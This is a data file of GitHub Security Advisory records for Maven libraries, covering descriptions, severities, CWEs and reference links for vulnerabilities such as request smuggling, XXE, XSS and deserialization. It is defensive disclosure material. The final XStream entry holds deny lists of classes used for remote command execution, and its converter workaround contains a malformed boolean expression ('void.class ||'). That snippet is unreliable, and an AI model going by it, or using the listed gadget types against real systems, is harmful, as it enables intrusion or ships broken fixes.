Maven | GHSA-p7jq-v8jp-j424 | Timing side channel vulnerability in endpoint request handler in Vaadin 15-19 | Non-constant-time comparison of CSRF tokens in endpoint request handler in `com.vaadin:flow-server` versions 3.0.0 through 5.0.3 (Vaadin 15.0.0 through 18.0.6), and com.vaadin:fusion-endpoint version 6.0.0 (Vaadin 19.0.0) allows attacker to guess a security token for Fusion endpoints via timing attack.
- https://vaadin.com/security/cve-2021-31406 | {'CVE-2021-31406'} | 2022-03-03T05:13:32.337447Z | 2021-04-19T14:50:38Z | MODERATE | null | {'CWE-208', 'CWE-203'} | {'https://vaadin.com/security/cve-2021-31406', 'https://nvd.nist.gov/vuln/detail/CVE-2021-31406', 'https://github.com/vaadin/flow/security/advisories/GHSA-p7jq-v8jp-j424', 'https://github.com/vaadin/flow/pull/10157'} | null |
Maven | GHSA-p2v9-g2qv-p635 | HTTP Request Smuggling in Netty | HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header. | {'CVE-2019-20445'} | 2022-03-03T05:14:16.100150Z | 2020-02-21T18:55:04Z | MODERATE | null | {'CWE-444'} | {'https://lists.apache.org/thread.html/ra9fbfe7d4830ae675bf34c7c0f8c22fc8a4099f65706c1bc4f54c593@%3Cissues.zookeeper.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0806', 'https://lists.apache.org/thread.html/r030beff88aeb6d7a2d6cd21342bd18686153ce6e26a4171d0e035663@%3Cissues.flume.apache.org%3E', 'https://lists.apache.org/thread.html/r36fcf538b28f2029e8b4f6b9a772f3b107913a78f09b095c5b153a62@%3Cissues.zookeeper.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0605', 'https://access.redhat.com/errata/RHSA-2020:0497', 'https://lists.apache.org/thread.html/r7790b9d99696d9eddce8a8c96f13bb68460984294ea6fea3800143e4@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/r804895eedd72c9ec67898286eb185e04df852b0dd5fe53cf5b6138f9@%3Cissues.zookeeper.apache.org%3E', 'https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final', 'https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b@%3Ccommits.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/ra1a71b576a45426af5ee65255be9596ff3181a342f4ba73b800db78f@%3Cdev.geode.apache.org%3E', 'https://lists.apache.org/thread.html/re45ee9256d3233c31d78e59ee59c7dc841c7fbd83d0769285b41e948@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/rbdb59c683d666130906a9c05a1d2b034c4cc08cda7ed41322bd54fe2@%3Cissues.flume.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0811', 'https://lists.apache.org/thread.html/rdb69125652311d0c41f6066ff44072a3642cf33a4b5e3c4f9c1ec9c2@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/r96e08f929234e8ba1ef4a93a0fd2870f535a1f9ab628fabc46115986@%3Cdev.zookeeper.apache.org%3E', 'https://github.com/netty/netty/pull/9865', 'https://access.redhat.com/errata/RHSA-2020:0606', 'https://github.com/netty/netty', 'https://lists.apache.org/thread.html/rf5b2dfb7401666a19915f8eaef3ba9f5c3386e2066fcd2ae66e16a2f@%3Cdev.flink.apache.org%3E', 'https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d@%3Ccommits.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r4ff40646e9ccce13560458419accdfc227b8b6ca4ead3a8a91decc74@%3Cissues.flume.apache.org%3E', 'https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b@%3Cnotifications.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60@%3Ccommits.zookeeper.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html', 'https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb@%3Cnotifications.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2020/09/msg00003.html', 'https://lists.apache.org/thread.html/r1fcccf8bdb3531c28bc9aa605a6a1bea7e68cef6fc12e01faafb2fb5@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r205937c85817a911b0c72655c2377e7a2c9322d6ef6ce1b118d34d8d@%3Cdev.geode.apache.org%3E', 'https://lists.apache.org/thread.html/r46f93de62b1e199f3f9babb18128681677c53493546f532ed88c359d@%3Creviews.spark.apache.org%3E', 'https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f@%3Ccommits.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r4d3f1d3e333d9c2b2f6e6ae8ed8750d4de03410ac294bcd12c7eefa3@%3Ccommits.cassandra.apache.org%3E', 'https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e@%3Cissues.flink.apache.org%3E', 'https://lists.apache.org/thread.html/r640eb9b3213058a963e18291f903fc1584e577f60035f941e32f760a@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r6945f3c346b7af89bbd3526a7c9b705b1e3569070ebcd0964bcedd7d@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r81700644754e66ffea465c869cb477de25f8041e21598e8818fc2c45@%3Cdev.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/ra2ace4bcb5cf487f72cbcbfa0f8cc08e755ec2b93d7e69f276148b08@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rb5c065e7bd701b0744f9f28ad769943f91745102716c1eb516325f11@%3Cissues.spark.apache.org%3E', 'https://lists.apache.org/thread.html/r70b1ff22ee80e8101805b9a473116dd33265709007d2deb6f8c80bf2@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/rff210a24f3a924829790e69eaefa84820902b7b31f17c3bf2def9114@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/raaac04b7567c554786132144bea3dcb72568edd410c1e6f0101742e7@%3Cissues.flink.apache.org%3E', 'https://usn.ubuntu.com/4532-1/', 'https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0567', 'https://lists.apache.org/thread.html/r832724df393a7ef25ca4c7c2eb83ad2d6c21c74569acda5233f9f1ec@%3Ccommits.pulsar.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2020/09/msg00004.html', 'https://lists.debian.org/debian-lts-announce/2020/02/msg00017.html', 'https://access.redhat.com/errata/RHSA-2020:0804', 'https://github.com/netty/netty/issues/9861', 'https://lists.apache.org/thread.html/r2f2989b7815d809ff3fda8ce330f553e5f133505afd04ffbc135f35f@%3Cissues.spark.apache.org%3E', 'https://www.debian.org/security/2021/dsa-4885', 'https://lists.apache.org/thread.html/r959474dcf7f88565ed89f6252ca5a274419006cb71348f14764b183d@%3Ccommits.cassandra.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46/', 'https://access.redhat.com/errata/RHSA-2020:0805', 'https://nvd.nist.gov/vuln/detail/CVE-2019-20445', 'https://access.redhat.com/errata/RHSA-2020:0601'} | null |
Maven | GHSA-mh27-rxmr-8q4c | Cross-site Scripting in Jenkins SiteMonitor Plugin | Jenkins SiteMonitor Plugin 0.6 and earlier does not escape URLs of sites to monitor in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission. | {'CVE-2022-28153'} | 2022-04-07T22:02:00.236711Z | 2022-03-30T00:00:23Z | MODERATE | null | {'CWE-79'} | {'https://www.jenkins.io/security/advisory/2022-03-29/#SECURITY-1932', 'http://www.openwall.com/lists/oss-security/2022/03/29/1', 'https://nvd.nist.gov/vuln/detail/CVE-2022-28153', 'https://github.com/jenkinsci/sitemonitor-plugin'} | null |
Maven | GHSA-85cw-hj65-qqv9 | Polymorphic Typing issue in FasterXML jackson-databind | A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to com.zaxxer.hikari.HikariDataSource. This is a different vulnerability than CVE-2019-14540. | {'CVE-2019-16335'} | 2022-03-03T05:14:16.323950Z | 2019-09-23T18:33:45Z | CRITICAL | null | {'CWE-502'} | {'https://lists.apache.org/thread.html/40c00861b53bb611dee7d6f35f864aa7d1c1bd77df28db597cbf27e1@%3Cissues.hbase.apache.org%3E', 'https://lists.apache.org/thread.html/a360b46061c91c5cad789b6c3190aef9b9f223a2b75c9c9f046fe016@%3Cissues.hbase.apache.org%3E', 'https://lists.apache.org/thread.html/dc6b5cad721a4f6b3b62ed1163894941140d9d5656140fb757505ca0@%3Cissues.hbase.apache.org%3E', 'https://lists.apache.org/thread.html/e90c3feb21702e68a8c08afce37045adb3870f2bf8223fa403fb93fb@%3Ccommits.hbase.apache.org%3E', 'https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0160', 'https://www.oracle.com/security-alerts/cpujan2020.html', 'https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0729', 'https://lists.apache.org/thread.html/0fcef7321095ce0bc597d468d150cff3d647f4cb3aef3bd4d20e1c69@%3Ccommits.tinkerpop.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20191004-0002/', 'https://nvd.nist.gov/vuln/detail/CVE-2019-16335', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q7CANA7KV53JROZDX5Z5P26UG5VN2K43/', 'https://www.debian.org/security/2019/dsa-4542', 'https://access.redhat.com/errata/RHSA-2020:0159', 'https://access.redhat.com/errata/RHSA-2020:0161', 'https://lists.apache.org/thread.html/ad0d238e97a7da5eca47a014f0f7e81f440ed6bf74a93183825e18b9@%3Cissues.hbase.apache.org%3E', 'https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2019/10/msg00001.html', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E', 'https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2019:3200', 'https://access.redhat.com/errata/RHSA-2020:0164', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://github.com/FasterXML/jackson-databind/issues/2449', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TH5VFUN4P7CCIP7KSEXYA5MUTFCUDUJT/', 'https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E', 'https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0445', 'https://seclists.org/bugtraq/2019/Oct/6', 'https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html'} | null |
Maven | GHSA-p6j8-hgv5-m35g | Uncontrolled Resource Consumption in jboss-remoting | A flaw was found in jboss-remoting in versions before 5.0.20.SP1-redhat-00001. A malicious attacker could cause threads to hold up forever in the EJB server by writing a sequence of bytes corresponding to the expected messages of a successful EJB client request, but omitting the ACK messages, or just tamper with jboss-remoting code, deleting the lines that send the ACK message from the EJB client code resulting in a denial of service. The highest threat from this vulnerability is to system availability. | {'CVE-2020-35510'} | 2022-03-18T18:02:36.089450Z | 2022-03-18T17:58:30Z | HIGH | null | {'CWE-400'} | {'https://bugzilla.redhat.com/show_bug.cgi?id=1905796', 'https://nvd.nist.gov/vuln/detail/CVE-2020-35510'} | null |
Maven | GHSA-9qcf-c26r-x5rf | XML external entity injection in Terracotta Quartz Scheduler | initDocumentParser in xml/XMLSchedulingDataProcessor.java in Terracotta Quartz Scheduler through 2.3.0 allows XXE attacks via a job description. | {'CVE-2019-13990'} | 2022-03-03T05:14:10.554139Z | 2020-07-01T17:55:03Z | CRITICAL | null | {'CWE-611'} | {'https://lists.apache.org/thread.html/r21df13c8bd2c2eae4b9661aae814c4a2a814d1f7875c765b8b115c9a@%3Ccommits.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/e493e718a50f21201e05e82d42a8796b4046e83f0d286b90e58e0629@%3Cdev.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/6b6e3480b19856365fb5eef03aa0915a4679de4b019a1e975502d949@%3Cdev.tomee.apache.org%3E', 'https://github.com/quartz-scheduler/quartz/pull/501', 'https://github.com/quartz-scheduler/quartz/issues/467', 'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://lists.apache.org/thread.html/r3a6884e8d819f32cde8c07b98934de3e80467859880f784950bf44cf@%3Ccommits.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/172d405e556e2f1204be126bb3eb28c5115af91bcc1651b4e870bb82@%3Cdev.tomee.apache.org%3E', 'https://snyk.io/vuln/SNYK-JAVA-ORGQUARTZSCHEDULER-461170', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://github.com/quartz-scheduler/quartz', 'https://nvd.nist.gov/vuln/detail/CVE-2019-13990', 'https://lists.apache.org/thread.html/re9b56ac1934d7bf16afc83eac1c39c98c1b20b4b15891dce923bf8aa@%3Ccommits.tomee.apache.org%3E', 'https://github.com/quartz-scheduler/quartz/commit/13c1d45aa1db15d0fa0e4997139c99ba219be551', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.apache.org/thread.html/1870324fea41ea68cff2fd1bf6ee2747432dc1d9d22a22cc681e0ec3@%3Cdev.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/f74b170d3d58d7a24db1afd3908bb0ab58a3900e16e73275674cdfaf@%3Ccommits.tomee.apache.org%3E'} | null |
Maven | GHSA-88cc-g835-76rp | Improper Restriction of XML External Entity Reference | PostgreSQL JDBC Driver (aka PgJDBC) before 42.2.13 allows XXE. | {'CVE-2020-13692'} | 2022-03-03T05:13:49.071925Z | 2022-02-10T00:30:07Z | HIGH | null | {'CWE-611'} | {'https://jdbc.postgresql.org/documentation/changelog.html#version_42.2.13', 'https://lists.apache.org/thread.html/r01ae1b3d981cf2e563e9b5b0a6ea54fb3cac8e9a0512ee5269e3420e@%3Ccommits.camel.apache.org%3E', 'https://lists.apache.org/thread.html/rfe363bf3a46d440ad57fd05c0e313025c7218364bbdc5fd8622ea7ae@%3Ccommits.camel.apache.org%3E', 'https://lists.apache.org/thread.html/r0478a1aa9ae0dbd79d8f7b38d0d93fa933ac232e2b430b6f31a103c0@%3Ccommits.camel.apache.org%3E', 'https://github.com/pgjdbc/pgjdbc/commit/14b62aca4764d496813f55a43d050b017e01eb65', 'https://lists.apache.org/thread.html/r631f967db6260d6178740a3314a35d9421facd8212e62320275fa78e@%3Ccommits.camel.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCCAPM6FSNOC272DLSNQ6YHXS3OMHGJC/', 'https://security.netapp.com/advisory/ntap-20200619-0005/', 'https://lists.apache.org/thread.html/rb89f92aba44f524d5c270e0c44ca7aec4704691c37fe106cf73ec977@%3Cnotifications.netbeans.apache.org%3E', 'https://lists.apache.org/thread.html/r4bdea189c9991aae7a929d28f575ec46e49ed3d68fa5235825f38a4f@%3Cnotifications.netbeans.apache.org%3E', 'https://lists.apache.org/thread.html/r00bcc6b2da972e0d6332a4ebc7807e17305d8b8e7fb2ae63d2a3cbfb@%3Ccommits.camel.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-13692', 'https://lists.apache.org/thread.html/r7f6d019839df17646ffd0046a99146cacf40492a6c92078f65fd32e0@%3Ccommits.camel.apache.org%3E', 'https://lists.apache.org/thread.html/r1aae77706aab7d89b4fe19be468fc3c73e9cc84ff79cc2c3bd07c05a@%3Ccommits.camel.apache.org%3E'} | null |
Maven | GHSA-j6qj-j888-vvgq | Directory exposure in jetty | ### Impact
If the `${jetty.base}` directory or the `${jetty.base}/webapps` directory is a symlink (soft link in Linux), the contents of the `${jetty.base}/webapps` directory may be deployed as a static web application, exposing the content of the directory for download.
For example, the problem manifests in the following `${jetty.base}`:
```$ tree demo-base/
demo-base/
├── etc
├── lib
├── resources
├── start.d
├── deploy
│ └── async-rest.war
└── webapps -> deploy
```
### Workarounds
Do not use a symlink | {'CVE-2021-28163'} | 2022-04-22T16:02:00.234470Z | 2021-04-06T17:32:00Z | LOW | null | {'CWE-200', 'CWE-59'} | {'https://lists.apache.org/thread.html/r2ea2f0541121f17e470a0184843720046c59d4bde6d42bf5ca6fad81@%3Cissues.solr.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://lists.apache.org/thread.html/rd0471252aeb3384c3cfa6d131374646d4641b80dd313e7b476c47a9c@%3Cissues.solr.apache.org%3E', 'https://lists.apache.org/thread.html/r787e47297a614b05b99d01b04c8a1d6c0cafb480c9cb7c624a6b8fc3@%3Cissues.solr.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GGNKXBNRRCZTGGXPIX3VBWCF2SAM3DWS/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5CXQIJVYU4R3JL6LSPXQ5GIV7WLLA7PI/', 'https://lists.apache.org/thread.html/r0841b06b48324cfc81325de3c05a92e53f997185f9d71ff47734d961@%3Cissues.solr.apache.org%3E', 'https://lists.apache.org/thread.html/r4a66bfbf62281e31bc1345ebecbfd96f35199eecd77bfe4e903e906f@%3Cissues.ignite.apache.org%3E', 'https://lists.apache.org/thread.html/rd7c8fb305a8637480dc943ba08424c8992dccad018cd1405eb2afe0e@%3Cdev.ignite.apache.org%3E', 'https://lists.apache.org/thread.html/rbefa055282d52d6b58d29a79fbb0be65ab0a38d25f00bd29eaf5e6fd@%3Cnotifications.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r111f1ce28b133a8090ca4f809a1bdf18a777426fc058dc3a16c39c66@%3Cissues.solr.apache.org%3E', 'https://lists.apache.org/thread.html/rf36f1114e84a3379b20587063686148e2d5a39abc0b8a66ff2a9087a@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r780c3c210a05c5bf7b4671303f46afc3fe56758e92864e1a5f0590d0@%3Cjira.kafka.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HAAKW7S66TECXGJZWB3ZFGOQAK34IYHF/', 'https://lists.apache.org/thread.html/r6ac9e263129328c0db9940d72b4a6062e703c58918dd34bd22cdf8dd@%3Cissues.ignite.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-j6qj-j888-vvgq', 'https://nvd.nist.gov/vuln/detail/CVE-2021-28163', 'https://lists.apache.org/thread.html/r8a1a332899a1f92c8118b0895b144b27a78e3f25b9d58a34dd5eb084@%3Cnotifications.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rddbb4f8d5db23265bb63d14ef4b3723b438abc1589f877db11d35450@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r5b3693da7ecb8a75c0e930b4ca26a5f97aa0207d9dae4aa8cc65fe6b@%3Cissues.ignite.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.apache.org/thread.html/r4b1fef117bccc7f5fd4c45fd2cabc26838df823fe5ca94bc42a4fd46@%3Cissues.ignite.apache.org%3E', 'https://lists.apache.org/thread.html/r67c4f90658fde875521c949448c54c98517beecdc7f618f902c620ec@%3Cissues.zookeeper.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20210611-0006/', 'https://github.com/eclipse/jetty.project', 'https://lists.apache.org/thread.html/r9974f64723875052e02787b2a5eda689ac5247c71b827d455e5dc9a6@%3Cissues.solr.apache.org%3E', 'https://lists.apache.org/thread.html/rbc075a4ac85e7a8e47420b7383f16ffa0af3b792b8423584735f369f@%3Cissues.solr.apache.org%3E'} | null |
Maven | GHSA-45h5-r968-5xr7 | Exposure of sensitive information in Elasticsearch | A flaw was discovered in Elasticsearch where document and field level security was not applied to searchable snapshots. This could lead to an authenticated user gaining access to information that they are unauthorized to view. | {'CVE-2021-22147'} | 2022-03-03T05:13:41.078482Z | 2021-09-20T20:29:40Z | MODERATE | null | {'CWE-732'} | {'https://www.elastic.co/community/security/', 'https://discuss.elastic.co/t/elastic-stack-7-14-0-security-update/280344', 'https://nvd.nist.gov/vuln/detail/CVE-2021-22147', 'https://security.netapp.com/advisory/ntap-20211008-0002/'} | null |
Maven | GHSA-vwx4-frpr-w27j | Improper Synchronization in Jenkins Convertigo Mobile Platform Plugin | Jenkins Convertigo Mobile Platform Plugin 1.1 and earlier uses static fields to store job configuration information, allowing attackers with Item/Configure permission to capture passwords of the jobs that will be configured. | {'CVE-2022-25210'} | 2022-02-24T17:41:42Z | 2022-02-16T00:01:14Z | MODERATE | null | {'CWE-662', 'CWE-820'} | {'https://nvd.nist.gov/vuln/detail/CVE-2022-25210', 'https://www.jenkins.io/security/advisory/2022-02-15/#SECURITY-2280', 'https://github.com/convertigo/Jenkins-plugin'} | null |
Maven | GHSA-4gf2-xv97-63m2 | Exposure of Sensitive Information in keycloak | A flaw was found in keycloak before version 9.0.1. When configuring an Conditional OTP Authentication Flow as a post login flow of an IDP, the failure login events for OTP are not being sent to the brute force protection event queue. So BruteForceProtector does not handle this events. | {'CVE-2020-1744'} | 2022-03-03T05:13:09.245997Z | 2021-09-20T20:43:24Z | MODERATE | null | {'CWE-755', 'CWE-200'} | {'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1744', 'https://access.redhat.com/security/cve/CVE-2020-1744', 'https://nvd.nist.gov/vuln/detail/CVE-2020-1744', 'https://github.com/keycloak/keycloak'} | null |
Maven | GHSA-45vg-2v73-vm62 | Moderate severity vulnerability that affects org.springframework:spring-core | The Java SockJS client in Pivotal Spring Framework 4.1.x before 4.1.5 generates predictable session ids, which allows remote attackers to send messages to other sessions via unspecified vectors. | {'CVE-2015-0201'} | 2022-03-03T05:13:59.085885Z | 2018-10-17T20:28:20Z | MODERATE | null | null | {'https://github.com/advisories/GHSA-45vg-2v73-vm62', 'https://pivotal.io/security/cve-2015-0201', 'https://nvd.nist.gov/vuln/detail/CVE-2015-0201'} | null |
Maven | GHSA-8p83-68cw-943f | Apache Ignite communicates to an external PHP server where sensitive information is sent | Apache Ignite 1.0.0-RC3 to 2.0 uses an update notifier component to update the users about new project releases that include additional functionality, bug fixes and performance improvements. To do that the component communicates to an external PHP server (http://ignite.run) where it needs to send some system properties like Apache Ignite or Java version. Some of the properties might contain user sensitive information. | {'CVE-2017-7686'} | 2022-04-26T19:15:47.503436Z | 2018-10-16T20:53:20Z | HIGH | null | {'CWE-200'} | {'https://nvd.nist.gov/vuln/detail/CVE-2017-7686', 'https://github.com/advisories/GHSA-8p83-68cw-943f', 'http://www.securityfocus.com/bid/99292', 'http://apache-ignite-developers.2346864.n4.nabble.com/CVE-2017-7686-Apache-Ignite-Information-Disclosure-td19168.html'} | null |
Maven | GHSA-2vxm-vp4c-fjfw | Authentication Bypass in Apache Cassandra | Apache Cassandra versions 2.1.0 to 2.1.22, 2.2.0 to 2.2.19, 3.0.0 to 3.0.23, and 3.11.0 to 3.11.9, when using 'dc' or 'rack' internode_encryption setting, allows both encrypted and unencrypted internode connections. A misconfigured node or a malicious user can use the unencrypted connection despite not being in the same rack or dc, and bypass mutual TLS requirement. | {'CVE-2020-17516'} | 2022-03-03T05:13:53.814455Z | 2022-02-09T01:01:22Z | HIGH | null | {'CWE-290'} | {'https://lists.apache.org/thread.html/r81243a412a37a22211754936a13856af07cc68a93d728c52807486e9@%3Ccommits.cassandra.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-17516', 'https://lists.apache.org/thread.html/rcb16f36cafa184dd159e94033f87d0fc274c4752d467f3a09f2ceae4@%3Ccommits.cassandra.apache.org%3E', 'http://mail-archives.apache.org/mod_mbox/cassandra-user/202102.mbox/%3c6E4340A5-D7BE-4D33-9EC5-3B505A626D8D@apache.org%3e', 'https://lists.apache.org/thread.html/rd84bec24907617bdb72f7ec907cd7437a0fd5a8886eb55aa84dd1eb8@%3Ccommits.cassandra.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20210521-0002/'} | null |
Maven | GHSA-gv5f-cjw9-5vxg | Camel-xstream component in Apache Camel can allow remote attackers to execute arbitrary commands | The camel-xstream component in Apache Camel before 2.15.5 and 2.16.x before 2.16.1 allow remote attackers to execute arbitrary commands via a crafted serialized Java object in an HTTP request. | {'CVE-2015-5344'} | 2022-04-26T19:30:13.226588Z | 2018-10-16T23:10:23Z | CRITICAL | null | null | {'https://github.com/advisories/GHSA-gv5f-cjw9-5vxg', 'https://lists.apache.org/thread.html/b4014ea7c5830ca1fc28edd5cafedfe93ad4af2d9e69c961c5def31d@%3Ccommits.camel.apache.org%3E', 'https://lists.apache.org/thread.html/2318d7f7d87724d8716cd650c21b31cb06e4d34f6d0f5ee42f28fdaf@%3Ccommits.camel.apache.org%3E', 'http://www.securityfocus.com/archive/1/537414/100/0/threaded', 'http://rhn.redhat.com/errata/RHSA-2016-2035.html', 'https://nvd.nist.gov/vuln/detail/CVE-2015-5344', 'http://www.securityfocus.com/bid/82260', 'http://camel.apache.org/security-advisories.data/CVE-2015-5344.txt.asc'} | null |
Maven | GHSA-mw36-7c6c-q4q2 | XStream can be used for Remote Code Execution | ### Impact
The vulnerability may allow a remote attacker to run arbitrary shell commands only by manipulating the processed input stream.
### Patches
If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.14.
### Workarounds
No user is affected, who followed the recommendation to setup XStream's Security Framework with a whitelist! Anyone relying on XStream's default blacklist can immediately switch to a whilelist for the allowed types to avoid the vulnerability.
Users of XStream 1.4.13 or below who still want to use XStream default blacklist can use a workaround depending on their version in use.
Users of XStream 1.4.13 can simply add two lines to XStream's setup code:
```Java
xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" });
xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
```
Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a black list will have to setup such a list from scratch and deny at least the following types: _javax.imageio.ImageIO$ContainsFilter_, _java.beans.EventHandler_, _java.lang.ProcessBuilder_, _java.lang.Void_ and _void_.
```Java
xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" });
xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });
```
Users of XStream 1.4.6 or below can register an own converter to prevent the unmarshalling of the currently know critical types of the Java runtime. It is in fact an updated version of the workaround for CVE-2013-7285:
```Java
xstream.registerConverter(new Converter() {
public boolean canConvert(Class type) {
return type != null && (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class || type == java.lang.Void.class || void.class || type.getName().equals("javax.imageio.ImageIO$ContainsFilter") || Proxy.isProxy(type));
}
public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
throw new ConversionException("Unsupported type due to security reasons.");
}
public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
throw new ConversionException("Unsupported type due to security reasons.");
}
}, XStream.PRIORITY_LOW);
```
### Credits
Chen L found and reported the issue to XStream and provided the required information to reproduce it. He was supported by Zhihong Tian and Hui Lu, both from Guangzhou University.
### References
See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2020-26217](https://x-stream.github.io/CVE-2020-26217.html).
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [XStream](https://github.com/x-stream/xstream/issues)
